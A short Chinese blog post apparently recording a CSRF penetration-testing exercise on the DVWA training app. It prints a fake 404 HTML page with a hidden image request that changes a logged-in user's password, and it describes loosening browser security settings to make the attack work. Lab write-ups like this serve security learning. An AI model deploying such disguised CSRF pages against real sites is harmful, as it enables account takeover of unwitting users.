【渗透测试】|基于dvwa的CSRF初级，中级，高级

一、渗透测试

二、渗透测试过程中遇到的问题和解决
在初级csrf中，想要通过伪造一个404页面，达到修改密码的效果
伪造404页面的html代码如下：

<html>
<head>
head>
<body>
<img src="http://192.xx.xx.xx/dvwa/vulnerabilities/csrf/?password_new=1234567&password_conf=1234567&Change=Change#" border='0' style="display:none;"/>
<h1>404<h1>
<h2>file not foundww.<h2>
body>
html>

通过打开这个html，页面出现了404，但是密码并没有更改成功

直接通过http://192.xx.xx.xx/dvwa/vulnerabilities/csrf/?password_new=1234567&password_conf=1234567&Change=Change#，密码是可以更改成功的。

解决： 关闭浏览器的一些安全设置，火狐浏览器如图:

解决过程：
通过html打开404页面时，发现cookie的secutiry 为 impossible，而直接在dvwa中修改密码的cookie的secutiry 为 low，两者的phpsessid也不一样，各种查资料，发现可能的浏览器的安全设置导致的。。。